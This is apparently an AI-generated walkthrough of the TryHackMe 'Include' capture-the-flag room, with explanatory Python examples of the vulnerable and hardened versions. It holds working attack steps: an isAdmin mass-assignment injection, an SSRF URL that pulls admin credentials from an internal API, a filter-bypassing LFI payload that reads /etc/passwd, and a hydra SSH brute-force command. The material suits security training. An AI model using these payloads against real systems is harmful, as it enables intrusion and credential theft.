Understanding CTF TryHackMe - Include
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
This guide walks through the Include room, a Capture The Flag (CTF) challenge on TryHackMe that focuses on server-side exploitation and web application penetration testing. The room chains several web weaknesses (a client-trusted admin flag, server-side request forgery against an internal API, and a local file inclusion with a filter bypass) into credentials, then into SSH access and two flags.
Key Points
- Initial scan: use nmap to identify open ports and services.
- Web exploration: analyse the web applications on ports 4000 and 50000.
- Privilege escalation: modify a profile-update parameter (isAdmin) to gain admin access.
- API exploitation: reach an internal API through the banner-image fetch to retrieve admin credentials.
- Local File Inclusion (LFI): exploit an LFI vulnerability to read system files.
- User enumeration: identify valid user accounts from /etc/passwd.
- Brute force: use hydra to guess an SSH password.
- Flag retrieval: locate and retrieve the flags hidden on the system.
Step-by-Step Walkthrough
Port Scan
Use nmap to scan for open ports and identify service versions (the default scan covers the 1000 most common TCP ports; add -p- to cover all 65535):
nmap -sV <IP>
Results:

| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.2p1 |
| 25 | SMTP | Postfix |
| 110 / 995 | POP3 / POP3 over SSL | Dovecot |
| 143 / 993 | IMAP / IMAP over SSL | Dovecot |
| 4000 | HTTP | Node.js (Express) |
| 50000 | HTTP | Apache 2.4.41 |
Web Exploration
Port 50000 - SysMon (Apache)
- Protected login page
- Access requires valid credentials
Port 4000 - Review App (Node.js)
- Accessible login page
- Provided credentials: guest:guest
- Social interface features:
  - View and add friends
  - Edit profile
- Observed behaviour: adding friends grants access to their profiles
- The profile-edit form has a custom activity field, and the same request carries a modifiable isAdmin parameter
Privilege Escalation via isAdmin
The profile-edit POST request includes an isAdmin field next to the editable activity field, and the server stores whatever value the client sends (a mass-assignment bug: privileged fields are not separated from user-editable ones). Set it in the request body:
{ "isAdmin": true }
For the guest profile, this unlocks two new sections in the interface: Settings and API.
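Why the injected field is honoured, as an added example that is not the Review App's own code: a minimal profile-update handler written the vulnerable way (merge the whole JSON body into the stored record) and the hardened way (copy only an allowlist of editable fields). The record shape and field names are assumptions.

```python
"""Mass assignment of a profile record: vulnerable merge beside an allowlist.

Added example; the Review App's real handler was not available, so the record
shape, the editable field set and the request bodies below are constructed."""

import copy
import json

# Constructed sample record for the guest account (assumed shape).
GUEST = {"username": "guest", "activity": "browsing", "isAdmin": False}

# Fields a user is legitimately allowed to change on their own profile.
EDITABLE_FIELDS = {"activity"}


def update_profile_vulnerable(user: dict, body: str) -> dict:
    """Every key in the JSON body is merged into the record, so a client
    can set privileged fields such as isAdmin by simply sending them."""
    record = copy.deepcopy(user)
    record.update(json.loads(body))
    return record


def update_profile_hardened(user: dict, body: str) -> dict:
    """Only explicitly editable fields are copied; anything else in the body,
    including isAdmin, is ignored (logging the attempt is left to the caller)."""
    record = copy.deepcopy(user)
    incoming = json.loads(body)
    for field, value in incoming.items():
        if field in EDITABLE_FIELDS:
            record[field] = value
    return record


if __name__ == "__main__":
    # Constructed request body: the legitimate edit plus the injected flag.
    body = json.dumps({"activity": "reading", "isAdmin": True})
    print("vulnerable isAdmin:", update_profile_vulnerable(GUEST, body)["isAdmin"])
    print("hardened  isAdmin:", update_profile_hardened(GUEST, body)["isAdmin"])
```

The same allowlist idea applies to any framework: bind request bodies to a schema of user-editable fields, and keep authorisation flags on the server side only.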
Exploiting the Internal API
API Section
- Two routes are documented: an example call, and a sensitive route:
/getAllAdmins101099991
Settings Section
- Form to change the banner image by supplying a URL; the server fetches that URL itself
- Server-side request forgery (SSRF): point the form at the internal API, which listens on localhost port 5000 and does not appear in the external port scan:
http://127.0.0.1:5000/getAllAdmins101099991
Result:
- The fetched body comes back embedded as a base64 data URL:
data:application/json;...;base64,<payload>
Decoding:
echo "<payload>" | base64 --decode
- The decoded JSON provides two sets of admin credentials (Review App and SysMon)
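Pulling the credentials out of the returned data URL, as an added example rather than part of the original walkthrough: the parser accepts any parameters between the MIME type and the payload (the part the page elides as "..."), repairs base64 padding that a proxy or copy-paste may have dropped, and walks the JSON for username/password pairs. The JSON structure and the sample response are constructed assumptions, not the room's real output.

```python
"""Decode a data: URL and extract credentials from the JSON it carries.

Added example; the response format beyond "data:application/json;...;base64,"
and the field names "username"/"password" are assumptions."""

import base64
import json
import re
from typing import List, Tuple
from urllib.parse import unquote_to_bytes

# data:<mime>[;param]*[;base64],<data>
DATA_URL_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<data>.*)$", re.S
)


def decode_data_url(url: str) -> Tuple[str, bytes]:
    """Return (mime type, raw bytes); handles base64 and percent-encoded bodies."""
    m = DATA_URL_RE.match(url.strip())
    if m is None:
        raise ValueError("not a data: URL")
    params = m.group("params").split(";")
    data = m.group("data").strip()
    if "base64" in params:
        data += "=" * (-len(data) % 4)  # restore padding that may have been dropped
        return m.group("mime"), base64.b64decode(data)
    return m.group("mime"), unquote_to_bytes(data)


def extract_credentials(url: str) -> List[Tuple[str, str]]:
    """Decode the URL, check the content type, and collect (username, password)
    pairs from any object in the JSON document, however deeply nested."""
    mime, raw = decode_data_url(url)
    if not mime.startswith("application/json"):
        raise ValueError("unexpected content type: %r" % mime)
    found: List[Tuple[str, str]] = []

    def walk(node):
        if isinstance(node, dict):
            if "username" in node and "password" in node:
                found.append((str(node["username"]), str(node["password"])))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(json.loads(raw))
    return found


# Constructed sample response (assumed shape, not the room's real data).
_SAMPLE_JSON = json.dumps([
    {"app": "reviewapp", "username": "admin", "password": "ExamplePass1"},
    {"app": "sysmon", "username": "sysadmin", "password": "ExamplePass2"},
])
SAMPLE_URL = "data:application/json;charset=utf-8;base64," + base64.b64encode(
    _SAMPLE_JSON.encode()
).decode()

if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_URL):
        print(f"{user}:{password}")
```

Paste the whole data URL from the banner response into SAMPLE_URL (or feed it on stdin in a real run) instead of hand-copying the payload into base64 --decode; the content-type check catches the case where the server returned an error page rather than the API response.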
Admin Access to SysMon
- Log in on port 50000 with the decoded SysMon credentials
- The dashboard displays CPU, RAM and disk usage
- Flag 1 is accessible here
HTML Analysis and LFI
- Inspect the page source: the profile image is loaded dynamically through a file parameter:
/profile?img=<file>
- Test the img= parameter for Local File Inclusion (LFI). A plain ../ traversal does not get through, so use the form that survives a filter which strips ../ once, non-recursively: each ....// collapses to ../ after a single removal. URL-encoded, the working payload is:
....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd
- The response contains the /etc/passwd file
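How the ....// payload gets past a strip-once filter, and what a check that does not rely on pattern stripping looks like, as an added example that is not the target application's code. The image directory, the exact filter and the single URL-decode are assumptions; the real handler was not available.

```python
"""A single-pass '../' filter beside a path-containment check.

Added example. IMAGE_DIR and the filter logic are assumptions about the
target; only the payload itself is taken from the walkthrough."""

import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed directory the server serves profile images from.
IMAGE_DIR = "/var/www/html/images"

# The walkthrough's payload, still URL-encoded as it travels in the query string.
PAYLOAD = "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"


def naive_sanitise(img: str) -> str:
    """Strip '../' in one pass. '....//' loses its middle '../' and collapses
    to '../', so the traversal survives the filter."""
    return unquote(img).replace("../", "")


def resolve_vulnerable(img: str) -> str:
    """Path the server opens after the naive filter (posixpath keeps this
    deterministic on any OS; a real server would use os.path)."""
    return posixpath.normpath(posixpath.join(IMAGE_DIR, naive_sanitise(img)))


def resolve_hardened(img: str) -> Optional[str]:
    """Decode exactly once, normalise, then require the result to stay inside
    IMAGE_DIR. Returns None when the request must be refused. In production,
    resolve with os.path.realpath as well so symlinks cannot escape the root."""
    candidate = posixpath.normpath(posixpath.join(IMAGE_DIR, unquote(img)))
    if candidate == IMAGE_DIR or not candidate.startswith(IMAGE_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print("after naive filter :", naive_sanitise(PAYLOAD))
    print("vulnerable opens   :", resolve_vulnerable(PAYLOAD))
    print("hardened opens     :", resolve_hardened(PAYLOAD))
    print("hardened plain ../ :", resolve_hardened("..%2F..%2F..%2F..%2Fetc%2Fpasswd"))
```

Note that the hardened version does not reject the ....// payload as an attack; it simply treats .... as an ordinary (nonexistent) directory name under IMAGE_DIR, which is the point: containment checks on the resolved path do not need to enumerate traversal spellings.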
User Enumeration
Results from /etc/passwd (look for accounts with UIDs from 1000 upward and an interactive login shell; service accounts use /usr/sbin/nologin or /bin/false):
- Two human users found:
joshua
charles
Brute Force SSH
Tool: hydra with the fasttrack wordlist against the joshua account (hydra itself warns that many SSH servers limit parallel connections and recommends adding -t 4 if attempts start failing):
hydra -l joshua -P /usr/share/wordlists/fasttrack.txt <IP> ssh
- Successful match found for joshua
SSH connection:
ssh joshua@<IP>
- Navigate to /var/www/html
- Flag 2 is found here
Complete Summary

| Step | Detail |
|---|---|
| Scan | nmap identifies services |
| Web | Two web apps to explore |
| Login guest | Review App on port 4000 |
| isAdmin=true | Unlocks admin sections |
| Internal API | SSRF to 127.0.0.1:5000; base64 response holds admin credentials |
| SysMon admin | Dashboard access + Flag 1 |
| LFI | Exposes /etc/passwd via the image parameter |
| Users | Found: joshua, charles |
| Brute force | hydra → SSH access as joshua |
| SSH | Flag 2 in /var/www/html |
Tools and Wordlists
- Tools: nmap, gobuster (directory enumeration; not shown in the steps above), hydra, base64, ssh
- Wordlists:
/usr/share/wordlists/SecLists/.../LFI-Jhaddix.txt
/usr/share/wordlists/fasttrack.txt